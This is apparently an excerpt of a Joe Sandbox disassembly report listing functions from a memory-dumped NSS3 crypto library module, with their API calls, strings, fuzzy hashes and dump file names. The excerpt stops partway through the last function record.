Opcode ID: 4f255b4bee377b4903fd6e4cf0c52f5f694028a853f81b578515065c6cc80cc3
Instruction ID: 1d78c919acc5acb1eaa85584e5cc00b4c25a6fd06f27f007481ac399e00e8759
Opcode Fuzzy Hash: 4f255b4bee377b4903fd6e4cf0c52f5f694028a853f81b578515065c6cc80cc3
Instruction Fuzzy Hash: 6E3145B5A00501BBD701AF15EC41A46BB72FF4231CB188134E80922F61EB72F978DBCA

Function 6C52DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C52DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C52DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C52DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C52DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52DECD

Strings

%s at line %d of [%.10s], xrefs: 6C52DF7C, 6C52DFEC
database corruption, xrefs: 6C52DF77, 6C52DFE7
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52DF6D, 6C52DFCC, 6C52DFDD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 9048a3f52895ae391beadfd7c263a81c600c0fbc8e220e27ff79da866e94fe75
Instruction ID: 2ea86b8b1759b3b9f894c645fe8a754082ffa934470198724a3ea73877160288
Opcode Fuzzy Hash: 9048a3f52895ae391beadfd7c263a81c600c0fbc8e220e27ff79da866e94fe75
Instruction Fuzzy Hash: 46A1F4716086019FC710CF29CC80A6AB7F5EF85308F19896DF8899BB81E738E855CB95

Function 6C5EEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C5EEE0B

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5EEEE1

Part of subcall function 6C5E1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C5E1D7E
Part of subcall function 6C5E1D50: EnterCriticalSection.KERNEL32(?), ref: 6C5E1D8E
Part of subcall function 6C5E1D50: PR_Unlock.NSS3(?), ref: 6C5E1DD3

TlsGetValue.KERNEL32 ref: 6C5EEE51
EnterCriticalSection.KERNEL32(?), ref: 6C5EEE65
PR_Unlock.NSS3(?), ref: 6C5EEEA2
free.MOZGLUE(?), ref: 6C5EEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C5EEED0
PR_Unlock.NSS3(?), ref: 6C5EEF48
free.MOZGLUE(?), ref: 6C5EEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C5EEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C5EEFA4
free.MOZGLUE(?), ref: 6C5EEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5EF055
free.MOZGLUE(?), ref: 6C5EF060

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: a650c8c1f3e6797b472e8519c1022cf69c57c3ad9360b113df4dfb819c127b1f
Instruction ID: 01949073c58d90e47079d2935071f8fa77d6b81e1a9b733fa343372b33d3a9a0
Opcode Fuzzy Hash: a650c8c1f3e6797b472e8519c1022cf69c57c3ad9360b113df4dfb819c127b1f
Instruction Fuzzy Hash: AE8160B1A00209ABDF00DFA5EC85BDE7BB5BF4D318F144024E919A7711EB71E924CBA5

Function 6C5B4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C5B4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C5B4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C5B4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C5B4E85
DER_Encode_Util.NSS3(?,?,6C7005A4,00000000), ref: 6C5B4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C5B4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C5B4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5B4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5B4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5B4FC8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: ef6ec3550dcd923003fb9259a0ea4fec7d4d2a446825c43850a6bff8a014bf8c
Instruction ID: e11f59f827e550f82c5cec37c874f2c95d8564f60355b99c4127a5eb95bb29a8
Opcode Fuzzy Hash: ef6ec3550dcd923003fb9259a0ea4fec7d4d2a446825c43850a6bff8a014bf8c
Instruction Fuzzy Hash: 87818171A08301AFE721CF24DC90B5BBBE4AB85358F14892DF958EB741E771E905CB92

Function 6C5F5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C5F5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C5F5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C5F5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C5F5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C5F5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C5F5E18
TlsGetValue.KERNEL32 ref: 6C5F5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C5F5E72
PR_Unlock.NSS3(?), ref: 6C5F5E8B

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

Strings

d, xrefs: 6C5F5C36
tokens=[0x%x=<%s>], xrefs: 6C5F5D3D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 4d54a2b66dc96a0254dc32a2f5c12cd78fff7a6b7bf50729c4fc12e54ce05252
Instruction ID: d8026ebe83e53a54379469932ff11ea7ac0951e5e7beed43ade7ea5f5b7c0bcb
Opcode Fuzzy Hash: 4d54a2b66dc96a0254dc32a2f5c12cd78fff7a6b7bf50729c4fc12e54ce05252
Instruction Fuzzy Hash: 6E713AF0E051049BEB089F25DC4176F3275AF8130CF948435E92A9AB42EB32ED16CF92

Function 6C5E8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C5E9582), ref: 6C5E8F5B

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C5E8F6A

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5E8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C5E8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C6CD820,6C5E9576), ref: 6C5E8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C5E901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C5E903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5E9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5E90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C5E90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C5E90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5E912D
free.MOZGLUE(00000000), ref: 6C5E9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5E9145

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 754f00ff63165c97bb5a4a6b8a8130104a86fdaa75f3e401aa2c037ac9cd1b43
Instruction ID: 1f45d6be90da1c4f03730011095dbcfa0e6092770b837c0afc8ee991b6e7cc98
Opcode Fuzzy Hash: 754f00ff63165c97bb5a4a6b8a8130104a86fdaa75f3e401aa2c037ac9cd1b43
Instruction Fuzzy Hash: B651C1B2A042009BEB04CF28DC81B9AB7E9EF89318F054929E95597741E731E949CBD7

Function 6C5DADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C5DADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAE29

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5DAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C5DAEA0

Strings

C_MessageSignInit, xrefs: 6C5DADE1
hKey = 0x%x, xrefs: 6C5DAE62, 6C5DAE72
hSession = 0x%x, xrefs: 6C5DAE01, 6C5DAE11
nkl, xrefs: 6C5DAEB8, 6C5DAEE6
(CK_INVALID_HANDLE), xrefs: 6C5DAE1F, 6C5DAE80

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nkl
API String ID: 332880674-1267772660
Opcode ID: c32bcd86fcff60a5bb18ffbc1341158f384e18dc586250327a881b5e1f9c8b98
Instruction ID: 496c4900926e3415eda997cd5e3adbe270a95f71b5c8b112dbad2257e7ac0f10
Opcode Fuzzy Hash: c32bcd86fcff60a5bb18ffbc1341158f384e18dc586250327a881b5e1f9c8b98
Instruction Fuzzy Hash: EF31B5B2701255EBDB00DF18DC88BAB3775EB86319F454439E409AB612DF34A918CB9E

Function 6C5D9EE0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6C5D9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9F49

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5D9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6C5D9FC0

Strings

hKey = 0x%x, xrefs: 6C5D9F82, 6C5D9F92
C_MessageEncryptInit, xrefs: 6C5D9F01
hSession = 0x%x, xrefs: 6C5D9F21, 6C5D9F31
nkl, xrefs: 6C5D9FD8, 6C5DA006
(CK_INVALID_HANDLE), xrefs: 6C5D9F3F, 6C5D9FA0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit$nkl
API String ID: 332880674-1742630112
Opcode ID: 7a3eadf26f6650019790a52ccd8e3611a69ad701902025f08947c43a55e3a14c
Instruction ID: f525ac60c53411188f48dc4bc5e02622b5f0cefb98dcfd60fbf81b5c71d26a59
Opcode Fuzzy Hash: 7a3eadf26f6650019790a52ccd8e3611a69ad701902025f08947c43a55e3a14c
Instruction Fuzzy Hash: D531C6B2701345ABDB01DF18DC88BAE3775EB86359F054439E408ABA41DF34A858CB9F

Function 6C5D2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C5D2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D2E33

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D2E81

Strings

C_InitPIN, xrefs: 6C5D2DF1
hSession = 0x%x, xrefs: 6C5D2E0E, 6C5D2E1E
ulPinLen = %d, xrefs: 6C5D2E7C
nkl, xrefs: 6C5D2E99, 6C5D2EC4
(CK_INVALID_HANDLE), xrefs: 6C5D2E2C
pPin = 0x%p, xrefs: 6C5D2E63

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nkl
API String ID: 1003633598-3380830098
Opcode ID: 5740d4ea72793b1bf2006ef217eb71f7390967ca0a5068ac02a1d430143eb44b
Instruction ID: 5010487eba9863e21accf4795693420b087458083c8498b9a8f445668ee9d450
Opcode Fuzzy Hash: 5740d4ea72793b1bf2006ef217eb71f7390967ca0a5068ac02a1d430143eb44b
Instruction Fuzzy Hash: 7431D5B2701255EBDB009F18DD4CB5A3B75EB86319F454039E808A7B11DF30AD48CBAE

Function 6C5D7E00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C5D7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7E63

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5D7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5D7EB1

Strings

ulPartLen = %d, xrefs: 6C5D7EAC
hSession = 0x%x, xrefs: 6C5D7E3E, 6C5D7E4E
nkl, xrefs: 6C5D7EC9, 6C5D7EF7
pPart = 0x%p, xrefs: 6C5D7E93
(CK_INVALID_HANDLE), xrefs: 6C5D7E5C
C_VerifyUpdate, xrefs: 6C5D7E21

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate$nkl
API String ID: 1003633598-2470974910
Opcode ID: 6f37e58dc50057744395a74ec0fecbd1639ea3463a67d000051f4bb78484a546
Instruction ID: 6697f0059d814829b68da6781241d14b7a147c282c7f5d21ffac1c8c80e73dc2
Opcode Fuzzy Hash: 6f37e58dc50057744395a74ec0fecbd1639ea3463a67d000051f4bb78484a546
Instruction Fuzzy Hash: 0331D7B5B01255EBD7009F68DD48B5B3BB1EB8235DF054038E808A7615DF30AD08CBAE

Function 6C5D6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C5D6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6F53

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5D6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5D6FA1

Strings

ulPartLen = %d, xrefs: 6C5D6F9C
C_DigestUpdate, xrefs: 6C5D6F11
hSession = 0x%x, xrefs: 6C5D6F2E, 6C5D6F3E
nkl, xrefs: 6C5D6FB9, 6C5D6FE7
pPart = 0x%p, xrefs: 6C5D6F83
(CK_INVALID_HANDLE), xrefs: 6C5D6F4C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nkl
API String ID: 1003633598-1820698345
Opcode ID: 17a3fa946b926cd0d51a1faeb3d4011d4ea9ba32d6bd2d48770605fc422cd9e9
Instruction ID: 019ad02e34a502b3c162c7582d488fabd5fab0b4088575cc0c1faa29053682d6
Opcode Fuzzy Hash: 17a3fa946b926cd0d51a1faeb3d4011d4ea9ba32d6bd2d48770605fc422cd9e9
Instruction Fuzzy Hash: 7431C4B57012559FDB00DB28DD48B4A3BB1EB82359F054439E808A7612DF30E959CBDB

Function 6C5D7F30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C5D7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7F93

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5D7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5D7FE1

Strings

ulSignatureLen = %d, xrefs: 6C5D7FDC
hSession = 0x%x, xrefs: 6C5D7F6E, 6C5D7F7E
nkl, xrefs: 6C5D7FF9, 6C5D8027
(CK_INVALID_HANDLE), xrefs: 6C5D7F8C
C_VerifyFinal, xrefs: 6C5D7F51
pSignature = 0x%p, xrefs: 6C5D7FC3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal$nkl
API String ID: 1003633598-3881341574
Opcode ID: cf7e38fd11c97cfb051d73e0c48a0d8c847d737baa02583ad0a570b23a6aba39
Instruction ID: fcf61cfb4ce7d58b6509dd60d4debe79f16c5fc86d08e87c598e26e1bf0c3071
